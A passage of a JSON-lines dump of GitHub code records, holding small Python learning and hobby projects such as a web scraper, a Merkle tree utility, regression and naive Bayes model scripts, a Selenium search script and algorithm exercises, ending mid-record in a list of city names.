+{"seq_id":"33607361520","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nPRODUCT_URL = \"https://www.amazon.com/Logitech-SUPERLIGHT-Ultra-Lightweight-Programmable-Compatible/dp/B087LXCTFJ\"\nHEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) \"\n \"AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/99.0.4844.51 Safari/537.36\",\n \"Request Line\": \"GET / HTTP/1.1\",\n}\n\nresponse = requests.get(url=PRODUCT_URL, headers=HEADERS)\nproduct_webpage = response.text\n\nsoup = BeautifulSoup(product_webpage, \"html.parser\")\nprice = soup.find(name=\"span\", class_=\"a-size-base a-color-price a-text-bold\")\n\nprint(soup.prettify())\n\n","repo_name":"terminhnator/LearningPython","sub_path":"day 47/Amazon Price Tracker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"37207455772","text":"\"\"\"\nDemo simulation script for osira using synthetic data.\n\nWritten by Ed Oughton.\n\nDecember 2020\n\n\"\"\"\nimport configparser\nimport os\nimport random\nimport pandas as pd\n\nfrom osira.sim import simulation, allocate_probabilities, cascading_failures\n\nCONFIG = configparser.ConfigParser()\nCONFIG.read(os.path.join(os.path.dirname(__file__), 'script_config.ini'))\nBASE_PATH = CONFIG['file_locations']['base_path']\n\nRESULTS = os.path.join(BASE_PATH, '..', 'results')\n\n\ndef load_data():\n \"\"\"\n Produce demo data.\n\n \"\"\"\n random.seed(42)\n\n data = {}\n\n for i in range(0, total_substation):\n data[i] = {\n 'id': i,\n 'population': random.randint(1e4, 1e5)\n }\n\n return data\n\n\ndef load_indirect_data():\n \"\"\"\n Produce indirect demo lookup table data.\n\n \"\"\"\n random.seed(42)\n\n data_indirect = {}\n\n for i in range(0, 100):\n\n rand = random.randint(1, 2)\n\n if rand == 1:\n function = 'Railway Station'\n elif rand == 2:\n function = 'Gas Distribution or Storage'\n else:\n print('Did not recognize selected int')\n\n data_indirect[i] = {\n 'dest_func': function,\n }\n\n return data_indirect\n\n\nif __name__ == '__main__':\n\n if not os.path.exists(RESULTS):\n os.makedirs(RESULTS)\n\n total_substation = 100\n num_substations = [4, 7, 14]\n iterations = 1000\n probabilities = [0.5, 0.1, 0.01]\n\n data = load_data()\n\n all_results = simulation(data, num_substations, probabilities, iterations)\n\n data_indirect = load_indirect_data()\n\n all_results = cascading_failures(all_results, data_indirect)\n\n cp_scenarios = allocate_probabilities(all_results, num_substations, probabilities)\n\n all_results = pd.DataFrame(all_results)\n path = os.path.join(RESULTS, 'all_results.csv')\n all_results.to_csv(path, index=False)\n\n cp_scenarios = pd.DataFrame(cp_scenarios)\n path = os.path.join(RESULTS, 'cp_scenarios.csv')\n cp_scenarios.to_csv(path, index=False)\n","repo_name":"edwardoughton/osira","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"42123121519","text":"import decimal\nfrom django.db import models\nfrom django_extensions.db.models import TimeStampedModel\nfrom ads.api import adwords\nfrom ads.api import bingads\nfrom ads.api import facebookads\nfrom base import utils\nfrom clients.models import Client\n\n\nclass Ad(TimeStampedModel):\n \"\"\"Ads Data Report\"\"\"\n client = models.ForeignKey('clients.Client', related_name='ads', null=True)\n conversions_adwords = models.DecimalField(\n 'Conversions (Adwords)', max_digits=16, decimal_places=0, null=True)\n cost_adwords = models.DecimalField(\n 'Cost (AdWords)', max_digits=16, decimal_places=2, null=True)\n conversions_bingads = models.DecimalField(\n 'Conversions (BingAds)', max_digits=16, decimal_places=0, null=True)\n cost_bingads = models.DecimalField(\n 'Cost (BingAds)', max_digits=16, decimal_places=2, null=True)\n conversions_facebookads = models.DecimalField(\n 'Conversions (FacebookAds)', max_digits=16, decimal_places=0,\n null=True)\n cost_facebookads = models.DecimalField(\n 'Cost (FacebookAds)', max_digits=16, decimal_places=2, null=True)\n\n # TODO use a special structure instead of dictionary here. Consider this\n\n @property\n def facebookads(self):\n return {\n 'conversions': self.conversions_facebookads,\n 'planned_conversions': self.client.planned_conversions_facebookads,\n 'planned_cpa': self.client.planned_cpa_facebookads,\n 'spend': self.cost_facebookads,\n 'budget': self.client.planned_budget_facebookads\n }\n\n @property\n def bingads(self):\n return {\n 'conversions': self.conversions_bingads,\n 'planned_conversions': self.client.planned_conversions_bingads,\n 'planned_cpa': self.client.planned_cpa_bingads,\n 'spend': self.cost_bingads,\n 'budget': self.client.planned_budget_bingads\n }\n\n @property\n def adwords(self):\n return {\n 'conversions': self.conversions_adwords,\n 'planned_conversions': self.client.planned_conversions_adwords,\n 'planned_cpa': self.client.planned_cpa_adwords,\n 'spend': self.cost_adwords,\n 'budget': self.client.planned_budget_adwords,\n }\n\n def sync_adwords(self):\n if self.client.adwords_id:\n try:\n api = adwords.API()\n customer_id = utils.unique_id_serialize(self.client.adwords_id)\n data = api.get_report(api.account_performance_report(),\n customer_id, adwords.Serializer)\n\n if data:\n self.conversions_adwords = data['Conversions']\n self.cost_adwords = data['Cost']\n self.save()\n print(self.client)\n except:\n self.client.failed_tries += 1\n self.client.save()\n\n def sync_bingads(self):\n # TODO Do it once in an hour as init extacts all the data at the moment\n if self.client.bingads_id:\n api = bingads.API()\n for item in api.as_dataset().dict:\n if item['AccountId'] == self.client.bingads_id:\n self.conversions_bingads = int(item['Conversions'])\n self.cost_bingads = decimal.Decimal(item['Spend'])\n self.save()\n\n def sync_facebookads(self):\n if self.client.facebookads_id:\n api = facebookads.API(self.client.facebookads_id)\n if api.data:\n self.conversions_facebookads = api.data[\n 'cost_per_total_action']\n self.cost_facebookads = api.data['spend']\n self.save()\n\n @staticmethod\n def sync():\n \"\"\"Sync all enabled clients\"\"\"\n clients = Client.objects.filter(is_enabled=True)\n for client in clients:\n if not client.is_custom:\n ad = Ad(client=client)\n ad.sync_adwords()\n ad.sync_bingads()\n ad.sync_facebookads()\n\n class Meta:\n ordering = ['-created']\n","repo_name":"bentensoft/marketing-api","sub_path":"apps/ads/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18691887184","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 18 11:03:40 2022\r\n\r\n@author: carme\r\n\"\"\"\r\n\r\nclass Solution:\r\n def lengthOfLongestSubstring(self, s: str) -> int:\r\n count = len(s)\r\n newList = []\r\n sol = 0\r\n for x in range(count):\r\n for y in range(x, count):\r\n if(s[y] in newList):\r\n newList.clear()\r\n break\r\n else:\r\n newList.append(s[y])\r\n if(sol ...:\n \"\"\"\n Initialize the MerkleTools object\n\n Parameters\n ----------\n hash_type : str\n The hash function to use. Can be \"sha256\" or \"sha3\"\n secure : bool\n If True, use the hash function to hash the leaves before adding them to the tree.\n \"\"\"\n hash_type = hash_type.lower()\n if hash_type in [\n \"sha256\",\n \"md5\",\n \"sha224\",\n \"sha384\",\n \"sha512\",\n \"sha3_256\",\n \"sha3_224\",\n \"sha3_384\",\n \"sha3_512\",\n ]:\n self.hash_function = getattr(hashlib, hash_type)\n else:\n raise Exception(\"`hash_type` {} nor supported\".format(hash_type))\n\n self._secure = secure\n self.reset_tree()\n\n @property\n def secure(self) -> bool:\n \"\"\"Check if the Merkle tree is secure.\"\"\"\n return self._secure\n\n # SPECIAL METHODS\n def __len__(self) -> int:\n return self.get_leaf_count()\n\n def __str__(self) -> str:\n \"\"\"Get the string representation of the Merkle tree.\"\"\"\n if self.get_tree_ready_state():\n return str(self.levels)\n else:\n return \"Tree not ready\"\n\n def __hash__(self) -> int:\n \"\"\"Get the hash of the Merkle tree.\"\"\"\n return int(self.get_merkle_root(), 16)\n\n def __eq__(self, other: \"MerkleTools\") -> bool:\n \"\"\"Check if two Merkle trees are equal.\"\"\"\n return self.__hash__() == other.__hash__()\n\n def __repr__(self) -> str:\n \"\"\"Get the string representation of the Merkle tree.\"\"\"\n return self.__str__()\n\n # LEAF METHODS\n def _to_hex(self, x: bytes) -> ...:\n \"\"\"\n Convert a byte array to hex string\n\n Parameters\n ----------\n x : bytearray\n The byte array to convert\n\n Returns\n -------\n str\n The hex string representation of the byte array\n \"\"\"\n try: # python3\n return x.hex()\n except: # python2\n return binascii.hexlify(x)\n\n def reset_tree(self) -> ...:\n \"\"\"Reset the MerkleTools object to its initial state.\"\"\"\n self.leaves = list()\n self.levels = None\n self.is_ready = False\n\n def add_leaf(self, value: bytes) -> ...:\n \"\"\"\n Add a leaf to the Merkle tree.\n\n Parameters\n ----------\n value : bytes\n The leaf value to add to the tree.\n \"\"\"\n if self._secure:\n value = self.hash_function(value).hexdigest()\n value = bytearray.fromhex(value)\n else:\n value = bytearray(value)\n self.leaves.append(value)\n\n def get_leaf(self, index: int) -> str:\n \"\"\"\n Get the leaf value at the given index.\n \n Parameters\n ----------\n index : int\n\n Returns\n -------\n str\n \"\"\"\n return self._to_hex(self.leaves[index])\n\n def get_leaf_count(self) -> int:\n \"\"\"Get the number of leaves in the tree.\"\"\"\n return len(self.leaves)\n\n def get_tree_ready_state(self) -> bool:\n \"\"\"Check if the tree is ready to generate proofs.\"\"\"\n return self.is_ready\n\n def _calculate_next_level(self) -> ...:\n \"\"\"Calculate the next level of the tree.\"\"\"\n solo_leave = None\n N = len(self.levels[0]) # number of leaves on the level\n if N % 2 == 1: # if odd number of leaves on the level\n solo_leave = self.levels[0][-1]\n N -= 1\n\n new_level = []\n for l, r in zip(self.levels[0][0:N:2], self.levels[0][1:N:2]):\n new_level.append(self.hash_function(l + r).digest())\n if solo_leave is not None:\n new_level.append(solo_leave)\n self.levels = [\n new_level,\n ] + self.levels # prepend new level\n\n def make_tree(self) -> ...:\n \"\"\"Make the Merkle tree.\"\"\"\n self.is_ready = False\n if self.get_leaf_count() > 0:\n self.levels = [\n self.leaves,\n ]\n while len(self.levels[0]) > 1:\n self._calculate_next_level()\n self.is_ready = True\n\n def get_merkle_root(self) -> str:\n \"\"\"\n Get the Merkle root of the tree.\n\n Returns\n -------\n str\n \"\"\"\n if not (self.is_ready and self.levels is not None):\n raise ValueError(\"Tree is not ready. Call `make_tree` first.\")\n return self._to_hex(self.levels[0][0])\n\n def get_proof_of_inclusion(self, key: bytes) -> list:\n \"\"\"\n Get the proof for the leaf at the given index.\n\n Parameters\n ----------\n key : bytes\n The key to get the proof for.\n\n Returns\n -------\n list\n The proof for the leaf at the given index.\n \"\"\"\n if self._secure:\n key = self.hash_function(key).hexdigest()\n key = bytearray.fromhex(key)\n else:\n key = bytearray(key)\n\n index = self.leaves.index(key)\n if self.levels is None or not self.is_ready:\n raise ValueError(\"Tree is not ready. Call `make_tree()` first.\")\n elif index > len(self.leaves) - 1 or index < 0:\n raise ValueError(\"`index` {} is out of range\".format(index))\n else:\n proof = []\n for x in range(len(self.levels) - 1, 0, -1):\n level_len = len(self.levels[x])\n if (index == level_len - 1) and (\n level_len % 2 == 1\n ): # skip if this is an odd end node\n index = int(index / 2.0)\n continue\n is_right_node = index % 2\n sibling_index = index - 1 if is_right_node else index + 1\n sibling_pos = \"left\" if is_right_node else \"right\"\n sibling_value = self._to_hex(self.levels[x][sibling_index])\n proof.append({sibling_pos: sibling_value})\n index = int(index / 2.0)\n return proof\n\n def verify_proof_of_inclusion(\n self, proof: list, target_hash: bytes, merkle_root: bytes\n ) -> bool:\n \"\"\"\n Validate the proof for the leaf at the given index.\n\n Parameters\n ----------\n proof : list\n The proof for the leaf at the given index.\n target_hash : bytes\n The hash of the leaf to validate the proof for.\n merkle_root : bytes\n The Merkle root of the tree.\n\n Returns\n -------\n bool\n True if the proof is valid, False otherwise.\n \"\"\"\n if len(proof) == 0:\n return target_hash == merkle_root\n else:\n proof_hash = target_hash\n for p in proof:\n try:\n # the sibling is a left node\n sibling = bytearray.fromhex(p[\"left\"])\n proof_hash = self.hash_function(sibling + proof_hash).digest()\n except:\n # the sibling is a right node\n sibling = bytearray.fromhex(p[\"right\"])\n proof_hash = self.hash_function(proof_hash + sibling).digest()\n return proof_hash == merkle_root\n","repo_name":"BasKleinIkkink/pymt","sub_path":"src/pymt/trie/merkletools.py","file_name":"merkletools.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"929750033","text":"import numpy as np\r\nimport math\r\nimport cmath\r\n#CHPT gates\r\ndef H_gate():\r\n H = np.zeros((2,2))\r\n H[0,0] = 1\r\n H[0,1] = 1\r\n H[1,0] = 1\r\n H[1,1] = -1\r\n H = (1.0/math.sqrt(2))*H\r\n return H \r\ndef Z_theta(theta):\r\n Z = np.zeros((2,2), dtype=\"complex_\")\r\n itheta = 1j*theta\r\n Z[0,0] =1\r\n Z[1,1] = cmath.exp(itheta)\r\n return Z\r\n\r\ndef P_gate():\r\n return Z_theta(math.pi/2.0)\r\ndef T_gate():\r\n return Z_theta(math.pi/4.0)\r\n\r\ndef C_gate():\r\n C = np.zeros((4,4))\r\n C[0,0]=1\r\n C[1,1]=1\r\n C[3,2]=1\r\n C[2,3]=1\r\n return C\r\n\r\n\r\ndef generate_gate_lists_one():\r\n gate_list=[]\r\n funcs = [H_gate,P_gate,T_gate]\r\n for f in funcs:\r\n gate_list.append(f())\r\n\r\n return gate_list\r\n\r\nprint(generate_gate_lists_one())","repo_name":"DrVogtster/python","sub_path":"well/gates.py","file_name":"gates.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41429289824","text":"import streamlit as st\nimport pandas as pd\nimport joblib\nfrom sklearn.ensemble import RandomForestClassifier\n\nst.write(\"\"\"\n# California home Prediction App\nThis app predicts the **Home Price **!\n\"\"\")\n\nst.sidebar.header('User Input Parameters')\n\ndef user_input_features():\n longitude = st.sidebar.slider('longitude', -124.350000, -114.310000, -119.569704)\n latitude = st.sidebar.slider('latitude', 35.631861, 41.950000, 35.631861)\n housingMedianAge = st.sidebar.slider('housingMedianAge', 1, 52, 28)\n totalRooms = st.sidebar.slider('totalRooms', 2, 39320, 2635)\n totalBedrooms = st.sidebar.slider('totalBedrooms', 1, 6445, 537)\n population = st.sidebar.slider('population', 3, 35682, 1425)\n households = st.sidebar.slider('households', 1, 6082, 499)\n medianIncome = st.sidebar.slider('medianIncome',0.499900, 15.000100, 3.870671)\n data = {'longitude': longitude,\n 'latitude': latitude,\n 'housingMedianAge': housingMedianAge,\n 'totalRooms': totalRooms,\n 'totalBedrooms': totalBedrooms,\n 'population': population,\n 'households': households,\n 'medianIncome': medianIncome\n }\n features = pd.DataFrame(data, index=[0])\n return features\n\ndf = user_input_features()\ndf_nonscaled = df.copy()\ndf_minmax = df.copy()\n\ndf_Zscore = df.copy()\ndf_XGB = df.copy()\nst.subheader('User Input parameters nonscaled')\nst.write(df_nonscaled)\n# Reads in saved scaler\nscaler = joblib.load(open('scaler_nm.save', 'rb'))\ndf_minmax=scaler.transform(df_minmax)\ndf_minmax = pd.DataFrame(df_minmax)\ndf_minmax.columns =['longitude', 'latitude', 'housingMedianAge', 'totalRooms',\n 'totalBedrooms', 'population', 'households', 'medianIncome']\n\nst.subheader('User Input parameters after min max scaling ')\nst.write(df_minmax)\n\n\n\n\n# Reads in saved scaler\nscaler = joblib.load(open('scaler_standardscaler.save', 'rb'))\ndf_Zscore=scaler.transform(df_Zscore)\ndf_Zscore = pd.DataFrame(df_Zscore)\ndf_Zscore.columns =['longitude', 'latitude', 'housingMedianAge', 'totalRooms',\n 'totalBedrooms', 'population', 'households', 'medianIncome']\n\nst.subheader('User Input parameters after Z score scaling')\nst.write(df_Zscore)\n\n\n\n\n#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$mno scale belowbelow$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nst.header('WITHOUT NORMALIZATION OR STANDARDIZATION')\n# Random Forest Prediction\n# Reads in saved regression model\nloaded_RF_clf = joblib.load(open('VK_RF_Model all features.pkl', 'rb'))\n\nrf_prediction = loaded_RF_clf.predict(df_nonscaled)\nst.subheader('Random Forest Prediction df_nonscaled')\nst.write(rf_prediction)\n\n\n# Linear regression\n# Reads in saved regression model\nloaded_LR_clf = joblib.load(open('VK_lr_model.pkl', 'rb'))\n\nlr_prediction = loaded_LR_clf.predict(df_nonscaled)\n\nst.subheader('Linear Regression Prediction df_nonscaled')\nst.write(lr_prediction)\n\n\n# RIDGE regression\n# Reads in saved regression model\nloaded_RR_clf = joblib.load(open('VK_RR_Model.pkl', 'rb'))\n\nRR_prediction = loaded_RR_clf.predict(df_nonscaled)\nst.subheader('RIDGE Regression Prediction df_nonscaled')\nst.write(RR_prediction)\n\n\n\n# LASSO regression\n# Reads in saved regression model\nloaded_LASSO_clf = joblib.load(open('VK_LASSO_Model.pkl', 'rb'))\n\nLASSO_prediction = loaded_LASSO_clf.predict(df_nonscaled)\nst.subheader('LASSO Regression Prediction df_nonscaled')\nst.write(LASSO_prediction)\nst.write(LASSO_prediction)\n\n\n\n# XG Boost Prediction\n\n# loaded_XGB_clf = joblib.load(open('VK_xgboost_model.pkl', 'rb'))\n# del df_XGB['households']\n# del df_XGB['totalRooms']\n# del df_XGB['totalBedrooms']\n# xgb_prediction = loaded_XGB_clf.predict(df_XGB)\n# st.subheader('XGBoost no households, totalRooms and totalBedrooms & no scaling ')\n# st.write(xgb_prediction)\n#st.write(#prediction#)\n\n\n\nst.header('WITH NORMALIZATION min max')\n#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$min max scaler below$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\n# Linear regression\n# Reads in saved regression model\nloaded_LR_clf_mm = joblib.load(open('VK_lr_model_mm.pkl', 'rb'))\n\nlr_prediction_mm = loaded_LR_clf_mm.predict(df_minmax)\n\nst.subheader('Linear Regression Prediction df_minmax')\nst.write(lr_prediction_mm)\n\n\n# RIDGE regression\n# Reads in saved regression model\nloaded_RR_clf_mm = joblib.load(open('VK_RR_Model_mm.pkl', 'rb'))\n\n\nRR_prediction_mm = loaded_RR_clf_mm.predict(df_minmax)\nst.subheader('RIDGE Regression Prediction df_minmax')\nst.write(RR_prediction_mm)\n\n\n\n# LASSO regression\n# Reads in saved regression model\nloaded_LASSO_clf_mm = joblib.load(open('VK_LASSO_Model_mm.pkl', 'rb'))\n\nLASSO_prediction_mm = loaded_LASSO_clf_mm.predict(df_minmax)\nst.subheader('LASSO Regression Prediction df_minmax')\nst.write(LASSO_prediction_mm)\n\n\n# ELASTIC regression\n# Reads in saved regression model\nloaded_ELASTIC_clf_mm = joblib.load(open('VK_ELASTIC_Model_mm.pkl', 'rb'))\n\nELASTIC_prediction_mm = loaded_ELASTIC_clf_mm.predict(df_minmax)\nst.subheader('ELASTIC Regression Prediction df_minmax')\nst.write(ELASTIC_prediction_mm)\n\n\nst.header('WITH StandardScaler STANDARDIZATION')\n\n#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Zscore standard scaler below$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\n# Linear regression\n# Reads in saved regression model\nloaded_LR_clf_standardscaler = joblib.load(open('VK_lr_model_standardscaler.pkl', 'rb'))\n\nlr_prediction_standardscaler = loaded_LR_clf_standardscaler.predict(df_Zscore)\n\nst.subheader('Linear Regression Prediction df_Zscore')\nst.write(lr_prediction_standardscaler)\n\n\n# RIDGE regression\n# Reads in saved regression model\nloaded_RR_clf_standardscaler = joblib.load(open('VK_RR_Model_standardscaler.pkl', 'rb'))\n\n\nRR_prediction_standardscaler = loaded_RR_clf_standardscaler.predict(df_Zscore)\nst.subheader('RIDGE Regression Prediction df_Zscore')\nst.write(RR_prediction_standardscaler)\n\n\n\n# LASSO regression\n# Reads in saved regression model\nloaded_LASSO_clf_standardscaler = joblib.load(open('VK_LASSO_Model_standardscaler.pkl', 'rb'))\n\nLASSO_prediction_standardscaler = loaded_LASSO_clf_standardscaler.predict(df_Zscore)\nst.subheader('LASSO Regression Prediction df_Zscore')\nst.write(LASSO_prediction_standardscaler)\n\n\n# ELASTIC regression\n# Reads in saved regression model\nloaded_ELASTIC_clf_standardscaler = joblib.load(open('VK_ELASTIC_Model_standardscaler.pkl', 'rb'))\n\nELASTIC_prediction_standardscaler = loaded_ELASTIC_clf_standardscaler.predict(df_Zscore)\nst.subheader('ELASTIC Regression Prediction df_Zscore')\nst.write(ELASTIC_prediction_standardscaler)\n\n\n\n\n\n\n\n\n#\n# st.subheader('Prediction')\n#\n# st.pyplot(loaded_clf.predictions)\n# sns.distplot(loaded_clf.predictions-y_test)\n","repo_name":"vkkurup/Project","sub_path":"Cal-state-house-price-predictor/homepredictor.py","file_name":"homepredictor.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74554982074","text":"from dataclasses import dataclass\nfrom itertools import count\nfrom operator import index\nfrom re import X\nimport pandas as pd\nimport xlsxwriter\n\ndef csv():\n data = pd.read_excel(r'/home/mshamyl/python practise/python basic/ubl.xlsx')\n df = pd.DataFrame(data, columns=['Topic',\n 'Question#',\n 'Question_English',\n 'Question_UR',\n 'Question_RU',\n 'Answer_English',\n 'Answer_UR',\n 'Answer_RU'\n ])\n counter = '1'\n file_string = '/home/mshamyl/faq'+counter+'.xlsx'\n print(file_string)\n workbook = xlsxwriter.Workbook(file_string)\n print(workbook)\n worksheet = workbook.add_worksheet(str(\"faq\") + str(counter))\n i = 0\n col_list = ['Topic', 'Question#', 'Question_English', 'Question_UR', 'Question_RU', 'Answer_English', 'Answer_UR', 'Answer_RU']\n for c in col_list:\n worksheet.write(0, i, c)\n i += 1\n row = 1\n for ind in df.index:\n # print(df['Question#'][ind])\n x = df['Question#'][ind]\n x = str(x)\n y = x.split('.',3)\n y = str(y[0])\n # print(y)\n column = 0\n for d in df.iloc[ind]:\n try:\n worksheet.write(row, column, d)\n column += 1\n except:\n pass\n row += 1\n if str(counter) == y:\n a=1\n # print(\"yas\")\n else:\n print(counter)\n workbook.close()\n counter = str(y)\n file_string = '/home/mshamyl/faq'+counter+'.xlsx'\n # print(file_string)\n workbook = xlsxwriter.Workbook(file_string)\n worksheet = workbook.add_worksheet(str(\"faq\") + str(counter))\n print(workbook)\n i=0\n for c in col_list:\n worksheet.write(0, i, c)\n i += 1\n row=1\n # print(\"counter value changed\")\n\n\n\n# /home/mshamyl/python practise/python basic/\nif __name__==\"__main__\":\n csv()","repo_name":"muhammadshamyl/python-modules","sub_path":"csv_file_split.py","file_name":"csv_file_split.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24405649031","text":"from tkinter import *\nfrom selenium import webdriver\nimport chromedriver_autoinstaller\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\n\nmain_window = Tk()\n\n#labels\nLabel(main_window, text=\"Enter cartoon name\").grid(row=0, column=0)\n\n#text input\ncartoon = Entry(main_window, width=80, borderwidth= 3)\ncartoon.grid(row=0, column=1)\n\n# checkbutton for ep or movies or both\nvar = StringVar()\nvar.set(\" \")\nep = Radiobutton(main_window, text=\"Episodes\", variable=var, value=\"episodes\").grid(row=1, column=0)\nmov = Radiobutton(main_window, text=\"Movies\", variable=var, value=\"movies\")\nmov.grid(row=1, column=1)\nboth = Radiobutton(main_window, text=\"Both\", variable=var, value=\" \")\nboth.grid(row=1, column=2)\n\n\n# automation script with user input\ndef click_button():\n chromedriver_autoinstaller.install()\n driver = webdriver.Chrome() \n driver.maximize_window()\n driver.get(\"https://raretoonshindi.in/\")\n\n search_btn = driver.find_element(by=By.XPATH, value=\"//*[@id='header']/div[1]/div/div/div/div[2]/div/span\")\n search_btn.click()\n\n search_bar = driver.find_element(by=By.XPATH, value=\"//*[@id='header']/div[1]/div/div/div/div[2]/div/div/form/input\")\n search_bar.send_keys(cartoon.get() + \" \" + var.get(), Keys.ENTER)\n main_window.destroy()\n while(True):\n pass\n\n#button\nButton(main_window, text=\"Go!\", width=20, bg=\"red\", command=click_button).grid(row=2, column=1)\n\nmain_window.mainloop()\n","repo_name":"MdAsimKhan/Selenium-Webdriver-Automation","sub_path":"Download Old Cartoons/old_cartoon_download.py","file_name":"old_cartoon_download.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71859183996","text":"#22.10.23\n#차이를 최대로\n#실버2\n#브루트 포스\n\n#풀이\nfrom collections import deque\n\nn = int(input())\nlst = list(map(int, input().rstrip().split()))\n\ndq = deque(sorted(lst))\na = dq.popleft()\nb = a\nanswer = 0\n\nwhile dq:\n if abs(a-dq[0]) > abs(a-dq[-1]):\n tmp_a = \"s\"\n else:\n tmp_a = \"e\"\n if abs(b-dq[0]) > abs(b-dq[-1]):\n tmp_b = \"s\"\n else:\n tmp_b = \"e\"\n \n if tmp_b == \"s\" and tmp_a == \"s\":\n if abs(a-dq[0]) > abs(b-dq[0]):\n answer += abs(a-dq[0])\n a = dq.popleft()\n else:\n answer += abs(b-dq[0])\n b = dq.popleft()\n elif tmp_a == \"s\":\n if abs(a-dq[0]) > abs(b-dq[-1]):\n answer += abs(a-dq[0])\n a = dq.popleft()\n else:\n answer += abs(b-dq[-1])\n b = dq.pop()\n elif tmp_b == \"s\":\n if abs(a-dq[-1]) > abs(b-dq[0]):\n answer += abs(a-dq[-1])\n a = dq.pop()\n else:\n answer += abs(b-dq[0])\n b = dq.popleft()\n else:\n if abs(a-dq[-1]) > abs(b-dq[-1]):\n answer += abs(a-dq[-1])\n a = dq.pop()\n else:\n answer += abs(b-dq[-1])\n b = dq.pop()\n \nprint(answer)\n\n#브루트 포스 - 재귀/백트래킹\n#불필요한 탐색은 하지 않는 것이 dfs랑 차이점이다.\nn = int(input())\nnums = list(map(int, input().split()))\nvisited = [False]*n\nanswer = 0\n\ndef getAnswer(lst):\n global answer\n if len(lst) == n:\n tmp = 0\n for i in range(n-1):\n tmp += abs(lst[i]-lst[i+1])\n answer = max(answer, tmp)\n return\n\n for i in range(n):\n if visited[i] == False:\n visited[i] = True\n getAnswer(lst + [nums[i]])\n visited[i] = False\n\ngetAnswer([])\nprint(answer)\n\n#브루트 포스 - 순열\nfrom itertools import permutations\n\nn = int(input())\nnums = list(map(int, input().split()))\nanswer = 0\n\nfor case in permutations(nums):\n tmp = 0\n for i in range(n-1):\n tmp += abs(case[i]-case[i+1])\n answer = max(answer, tmp)\n\nprint(answer)","repo_name":"915dbfl/youlAlgorithm","sub_path":"zip/backtracking/maximum_difference🙄.py","file_name":"maximum_difference🙄.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23932983710","text":"from utils.data_loader import DataLoader\nfrom utils.model import NaVieBayes\nfrom sklearn.metrics import accuracy_score, f1_score\nimport pickle\n\nloader = DataLoader()\nlen_vocab = len(loader.vocab)\nfeatures, target = loader.get_data()\nn = len(target)\nindexs = [i//2 if i % 2 == 0 else i//2 + n//2 for i in range(n)]\nfeatures = [features[i] for i in indexs]\ntarget = [target[i] for i in indexs]\nk_fold = 5\nbatch_size = len(target)//k_fold\n\nfor i in range(k_fold):\n model = NaVieBayes(num_class=2, len_vocab=len_vocab, alpha=1)\n features_train = features[0: batch_size*i] + features[batch_size*(i+1):]\n target_train = target[0: batch_size*i] + target[batch_size*(i+1):]\n features_test = features[batch_size*i: batch_size*(i+1)]\n target_test = target[batch_size*i: batch_size*(i+1)]\n model.fit(features_train, target_train)\n y_pred = model.predict(features_test)\n print('model {}: acc: {}, f1_score: {}'.format(i, accuracy_score(target_test, y_pred), f1_score(target_test, y_pred, average=None)))\n with open('models/nb_model_' + str(i) + '.pkl', 'wb+') as f:\n pickle.dump(model, f)\n\nprint('Done')\n","repo_name":"chiendb97/naive_bayes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10058151953","text":"requirementsSuccess = True\n\n\ntry:\n import dateutil\nexcept:\n requirementsSuccess = False\n\n\nasync def setup(bot):\n if requirementsSuccess:\n from .remindme import RemindMe\n await bot.add_cog(RemindMe(bot))\n else:\n raise RuntimeError(\"You are missing requirements. Please run:\\n\"\n \"`pip3 install python-dateutil`\")\n","repo_name":"Sazmap/SazCogs","sub_path":"RemindMe/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23964462091","text":"import requests\nimport random\n\n\nurl = \"https://openweathermap.org/\"\n\ncities = [\n \"Praia,cv\",\n \"Helsinki,fi,\",\n \"Dublin,ie\",\n \"Bucharest,ro\",\n \"Madrid,es\",\n \"Stockholm,se\",\n \"Tunis,tn\",\n \"Ankara,tr\",\n \"Toshloq,uz\",\n \"Cardiff,gb\",\n \"Mustaba,ye\",\n \"Valletta,mt\",\n \"Porto Novo,pt\",\n \"Chicago,il,us\",\n \"Rome,it\",\n \"Kairo,eg\",\n \"Sofia,bg\",\n 